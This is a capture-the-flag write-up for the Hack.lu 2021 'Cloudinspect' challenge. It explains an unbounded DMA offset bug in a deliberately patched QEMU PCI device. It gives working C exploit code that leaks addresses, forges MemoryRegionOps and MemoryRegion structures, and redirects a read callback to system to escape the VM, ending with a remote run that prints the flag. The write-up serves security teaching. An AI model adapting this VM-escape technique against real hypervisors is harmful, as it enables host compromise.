NOTE: The following is a writeup for the solution we developed independently for this challenge after the end of the competition.
Cloudinspect was a pwn challenge during Hack.lu CTF 2021 that got 14 solves. We are given a patched qemu-system-x86_64
binary, the patch itself as a dife file, and a Linux kernel and filesystem to launch with the qemu binary (initramfs.cpio.gz
and vmlinuz-5.11.0-38-generic
). Additionaly, we have some shell scripts to launch the VM and rebuild qemu.
The qemu patch adds a new emulated PCI device that will be available from the machine. You can read the added code here. This emulated device runs as a part of qemu’s process, meaning that if we can exploit it, we can very likely escape the VM, which is the target of this challenge.
Code analysis
The device gets declared through several functions we do not really care about. Then the device registers a memory region so the guest OS can interact with it via memory-mapped IO (MMIO):
1
2
3
4
5
6
7
8
9
10
11
12
static void pci_cloudinspect_realize(PCIDevice *pdev, Error **errp) {
CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);
if (msi_init(pdev, 0, 1, true, false, errp)) {
return;
}
cloudinspect->as = &address_space_memory;
memory_region_init_io(&cloudinspect->mmio, OBJECT(cloudinspect), &cloudinspect_mmio_ops, cloudinspect,
"cloudinspect-mmio", 1 * MiB);
pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &cloudinspect->mmio);
}
From the qemu docs:
MMIO: a range of guest memory that is implemented by host callbacks; each read or write causes a callback to be called on the host. You initialize these with memory_region_init_io(), passing it a MemoryRegionOps structure describing the callbacks.
The device emulation objects will use memory_region_init_io() to install their MMIO handlers, and pci_register_bar() to associate those handlers with a PCI BAR, as they do within QEMU currently.
The function prototype for memory_region_init_io
is:
1
2
3
4
5
6
7
8
void memory_region_init_io(
MemoryRegion *mr,
Object *owner,
const MemoryRegionOps *ops,
void *opaque,
const char *name,
uint64_t size
)
Note that the state structure itself (cloudinspect
) is passed as the opaque
parameter, as this will be useful later. The CloudInspectState
and cloudinspect_mmio_ops
structures have the following layout:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define DMA_SIZE 4096
struct CloudInspectState {
PCIDevice pdev;
MemoryRegion mmio;
AddressSpace *as;
struct dma_state {
dma_addr_t src;
dma_addr_t dst;
dma_addr_t cnt;
dma_addr_t cmd;
} dma;
char dma_buf[DMA_SIZE];
};
static const MemoryRegionOps cloudinspect_mmio_ops = {
.read = cloudinspect_mmio_read,
.write = cloudinspect_mmio_write,
.endianness = DEVICE_NATIVE_ENDIAN,
.valid = {
.min_access_size = 4,
.max_access_size = 8,
},
.impl = {
.min_access_size = 4,
.max_access_size = 8,
},
};
Whenever we interact with the PCI device via MMIO, qemu will call cloudinspect_mmio_ops->read
(cloudinspect_mmio_read
) and cloudinspect_mmio_ops->write
(cloudinspect_mmio_write
); the opaque
value we saw earlier will be passed as their first parameter. Let us take a look at these callbacks.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size) {
CloudInspectState *cloudinspect = opaque;
uint64_t val = ~0ULL;
switch (addr) {
case 0x00:
val = 0xc10dc10dc10dc10d;
break;
case CLOUDINSPECT_MMIO_OFFSET_CMD:
val = cloudinspect->dma.cmd;
break;
case CLOUDINSPECT_MMIO_OFFSET_SRC:
val = cloudinspect->dma.src;
break;
case CLOUDINSPECT_MMIO_OFFSET_DST:
val = cloudinspect->dma.dst;
break;
case CLOUDINSPECT_MMIO_OFFSET_CNT:
val = cloudinspect->dma.cnt;
break;
case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
val = cloudinspect_DMA_op(cloudinspect, false);
break;
}
return val;
}
static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
CloudInspectState *cloudinspect = opaque;
switch (addr) {
case CLOUDINSPECT_MMIO_OFFSET_CMD:
cloudinspect->dma.cmd = val;
break;
case CLOUDINSPECT_MMIO_OFFSET_SRC:
cloudinspect->dma.src = val;
break;
case CLOUDINSPECT_MMIO_OFFSET_DST:
cloudinspect->dma.dst = val;
break;
case CLOUDINSPECT_MMIO_OFFSET_CNT:
cloudinspect->dma.cnt = val;
break;
case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
val = cloudinspect_DMA_op(cloudinspect, true);
break;
}
}
Both of them look really similar. If we read or write at certain offsets in the memory region corresponding to the vulnerable device, we will be reading or writing to the structure in cloudinspect.dma
, which had its layout described above. The only exception is the last case, which triggers a call to cloudinspect_DMA_op
. cloudinspect_DMA_op
simply checks that cloudinspect->dma.cmd
has one of two specified values (it does not matter which), and that cloudinspect->dma.cnt
is not greater than DMA_SIZE
(4906). It then calls cloudinspect_dma_rw
, propagating the second parameter (write
):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write) {
if (write) {
uint64_t dst = cloudinspect->dma.dst;
// DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
dma_memory_read(
cloudinspect->as,
cloudinspect->dma.src,
cloudinspect->dma_buf + dst,
cloudinspect->dma.cnt
);
} else {
uint64_t src = cloudinspect->dma.src;
// DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
dma_memory_write(
cloudinspect->as,
cloudinspect->dma.dst,
cloudinspect->dma_buf + src,
cloudinspect->dma.cnt
);
}
}
So far, we know that we can interact with a memory region via MMIO and trigger calls to dma_memory_write
and dma_memory_read
. The second parameter to each of these functions is a physical address in the guest’s memory, the third one is an address in qemu’s regular virtual address space, and the fourth one is the amount of bytes to be transferred between each.
Interacting with the PCI device
In order to exploit the device, we first must find a way to interact with it. After launching the VM, we can use lspci -v
to get a list of available devices:
1
2
3
4
5
6
/ # lspci -v
00:01.0 Class 0601: 8086:7000
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:01.1 Class 0101: 8086:7010
00:02.0 Class 00ff: 1337:1337
The device with ID 1337 looks interesting. In the source code for our device, we find the following defines:
1
2
#define CLOUDINSPECT_VENDORID 0x1337
#define CLOUDINSPECT_DEVICEID 0x1337
Now that we have identified the device, we can list its memory range with /proc/iomem
:
1
2
3
4
5
/ # cat /proc/iomem
...
08000000-febfffff : PCI Bus 0000:00
feb00000-febfffff : 0000:00:02.0
...
The memory range for device 00:02.0
is feb00000-febfffff
. If we map it and read its offset zero, we should see the magic number shown the switch case case in cloudinspect_mmio_read
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#define DEV_ADDR 0xfeb00000
#define MAP_SIZE 0xfffff
typedef uint64_t u64;
u64 read_magic(volatile void* mem) {
return *(u64*)((uintptr_t)mem);
}
void* map_device(int fd) {
void* mem;
mem = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, DEV_ADDR);
if (mem == MAP_FAILED)
err(EXIT_FAILURE, "mmap");
return mem;
}
void unmap_device(volatile void* mem) {
munmap((void*)mem, MAP_SIZE);
}
int main() {
int fd;
volatile void* mem;
u64 magic;
fd = open("/dev/mem", O_RDWR | O_SYNC);
if (fd < 0)
err(EXIT_FAILURE, "open");
mem = map_device(fd);
magic = read_magic(mem);
assert(magic == 0xc10dc10dc10dc10d);
unmap_device(mem);
close(fd);
return EXIT_SUCCESS;
}
Now that we can interact with the device, it is time to exploit it.
Exploitation
The bug is clear: cloudinspect->dma.cnt
is bounded to a maximum of 4096, but cloudinspect->dma.dst
and cloudinspect->dma.src
are not. This means we can read and write to any location we want outside of cloudinspect->dma_buf
when using dma_memory_read
and dma_memory_write
.
Our first goal is to obtain a memory leak in order to break ASLR. We took the simplest approach: we started printing blocks of 8 bytes, starting at cloudinspect->dma_buf + 4096
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
u64 virt2phys(volatile void* p) {
/* https://github.com/kitctf/writeups/blob/2af257868242fafef4a204349d22227b62d9b8bb/hitb-gsec-2017/babyqemu/pwn.c#L35 */
}
void write_dst(volatile void* mem, u64 dst) {
*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_DST) = dst;
}
void write_src(volatile void* mem, u64 src) {
*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_SRC) = src;
}
void write_cmd(volatile void* mem, u64 cmd) {
*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_CMD) = cmd;
}
void write_cnt(volatile void* mem, u64 cnt) {
*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_CNT) = cnt;
}
u64 read_trigger(volatile void* mem) {
u64 out;
write_cmd(mem, CLOUDINSPECT_DMA_GET_VALUE);
out = *(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_TRIGGER);
if (!out)
warnx("read_trigger");
return out;
}
void read_from_dma_buf(volatile void* mem, u64 local_phys, u64 size, u64 off) {
write_cnt(mem, size);
write_dst(mem, local_phys);
write_src(mem, off);
read_trigger(mem);
}
int main() {
int fd;
volatile void* mem;
volatile void* buf;
u64 buf_phys;
u64 i;
fd = open("/dev/mem", O_RDWR | O_SYNC);
if (fd < 0)
err(EXIT_FAILURE, "open");
mem = map_device(fd);
buf_phys = virt2phys(buf);
for (i = 0; i < 100; ++i) {
read_from_dma_buf(mem, buf_phys, sizeof(u64), DMA_SIZE + (i * 8));
printf("%lu: 0x%lx\n", i, *(volatile u64*)buf);
}
unmap_device(mem);
close(fd);
return EXIT_SUCCESS;
}
We found the 7th value to be a reliable leak off of which we can calculate the address of any function as an offset of it. However, this leak will not work with heap addresses, as the heap’s base address is randomized for every execution, and it is not mapped at a constant offset from the executable regions in the process. We were not able to get a reliable leak for the heap both locally and remotely, so we resorted to avoid them.
Our strategy at this point is to overwrite a function pointer with the address of libc’s system
function; ideally we should also be able to control its first parameter.
CloudInspectState
has a field called mmio
, which has the type MemoryRegion
. We can take a look at this structure’s layout within qemu’s source code:
1
2
3
4
5
struct MemoryRegion {
const MemoryRegionOps *ops;
void *opaque;
/* snip */
};
Every time a read or write is performed on a MMIO region, one of the callbacks in ops
is called with opaque
as its first parameter. If we can swap the ops
pointer to a structure we control, and then make opaque
point to a string like /bin/sh
, we can escape the VM! Our gameplan is the following:
- Read
cloudstate.mmio->ops
. - Change
ops->read
to point to libc’ssystem
. - Write our fake
ops
intodma_buf
. - Write the string
cat flag
at a different offset indma_buf
. - Read
cloudstate.mmio
. - Patch
mmio
:- Make
mmio->ops
point to our structure indma_buf
. - Make
mmio->opaque
point to our string indma_buf
.
- Make
- Write
mmio
back to its location withincloudstate
. - Trigger a read in order for
cloudstate.mmio->ops->read
to be called.
In order to do this, there are some addresses we need to know:
- The address of
mmio->ops
. We can obtain it from our leak we got earlier, as it does not live in the heap. - The address of libc’s
system
. We can obtain this from our leak as well. - The address of
cloudstate
. We need it to obtain the address ofdma_buf
as an offset from it. We will makemmio->opaque
andmmio->ops
point todma_buf
; we also need it in order to read/write any absolute address, as the parameter passed todma_memory_read
/dma_memory_write
is calculated fromcloudstate->dma_buf
. Without it, we cannot readmmio->ops
even if we know the absolute address.
The key to leaking cloudstate
’s address is the fact that cloudstate.mmio->opaque
contains a pointer to it (as seen in pci_cloudinspect_realize
). Therefore, we can overflow the 64-bit addition in cloudinspect_dma_rw
(cloudinspect->dma_buf + src
) in order to read at a negative offset from dma_buf
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/*
struct CloudInspectState {
PCIDevice pdev;
MemoryRegion mmio; <--- mmio->opaque at offset 80
AddressSpace *as;
struct dma_state {
dma_addr_t src;
dma_addr_t dst;
dma_addr_t cnt;
dma_addr_t cmd;
} dma;
char dma_buf[DMA_SIZE]; <--- cloudinspect->dma_buf + src => overflow
};
*/
/*
* (gdb) print sizeof(PCIDevice)
* $1 = 2288
* (gdb) print sizeof(MemoryRegion)
* $5 = 240
*/
#define PCIDEVICE_STRUCT_SIZE 2288
#define MEMORYREGION_SIZE 240
static u64 qemu_system = 0;
static u64 ops_addr = 0;
static u64 cloudstate_addr = 0;
static u64 mmio_addr = 0;
static u64 dma_buf_addr = 0;
volatile void* map_buf() {
volatile void* out;
out = mmap(NULL, DMA_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (out == MAP_FAILED)
err(EXIT_FAILURE, "mmap");
memset((void*)out, 0, DMA_SIZE);
return out;
}
void unmap_buf(volatile void* buf) {
munmap((void*)buf, DMA_SIZE);
}
void get_leaks(volatile void* mem) {
volatile void* buf;
u64 buf_phys;
buf = map_buf();
buf_phys = virt2phys(buf);
read_from_dma_buf(mem, buf_phys, sizeof(u64), DMA_SIZE + (6 * 8));
leak = *(volatile u64*)buf;
qemu_system = leak - 0x37b7b0;
ops_addr = leak + 0x663a10;
/* We set `src` to be a negative value, which becomes a big value when casted to unsigned */
read_from_dma_buf(mem, buf_phys, sizeof(u64), (u64)(-((5 * 8) + (MEMORYREGION_SIZE - 80))));
cloudstate_addr = *(u64*)buf;
mmio_addr = cloudstate_addr + PCIDEVICE_STRUCT_SIZE;
dma_buf_addr = cloudstate_addr + PCIDEVICE_STRUCT_SIZE + MEMORYREGION_SIZE + (5 * 8);
unmap_buf(buf);
}
Of course, in order to replace the fields we want, we need to have similar structures to the one qemu uses:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* Replacement for MemoryRegionOps. Size=80 */
struct FakeRegionOps {
volatile void* read;
volatile void* write;
volatile unsigned char b[80 - 16];
};
/*
* Replacement for MemoryRegion.
* (gdb) print (int)&((struct MemoryRegion*)0)->ops
* $3 = 72
* (gdb) print (int)&((struct MemoryRegion*)0)->opaque
* $4 = 80
* (gdb) print sizeof(struct MemoryRegion)
* $5 = 240
*/
struct FakeRegion {
unsigned char p[72];
const struct FakeRegionOps *ops;
void *opaque;
unsigned char b[240 - 16 - 72];
};
Combining all the pieces, we are able to execute our gameplan above. You can find our full exploit here.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ { stat -c "%s" solve; sleep 1; cat solve; } | nc flu.xxx 20065
...
magic=c10dc10dc10dc10d
leak: 0x55f73a523510
cloudstate @ 0x55f73c312380
cloudstate->dma_buf @ 0x55f73c312d88
old ops->read: 0x55f73a221480
new ops->read: 0x55f73a1a7d60
> Writing fake_ops to dma_buf
> Writing shell to dma_buf
> Reading mmio
old mmio->ops: 0x55f73ab86f20
old mmio->opaque: 0x55f73c312380
new mmio->ops: 0x55f73c312d88
new mmio->opaque: 0x55f73c312dd8
> Writing fake mmio
> Triggering mmio read
flag{cloudinspect_inspects_your_cloud_0107}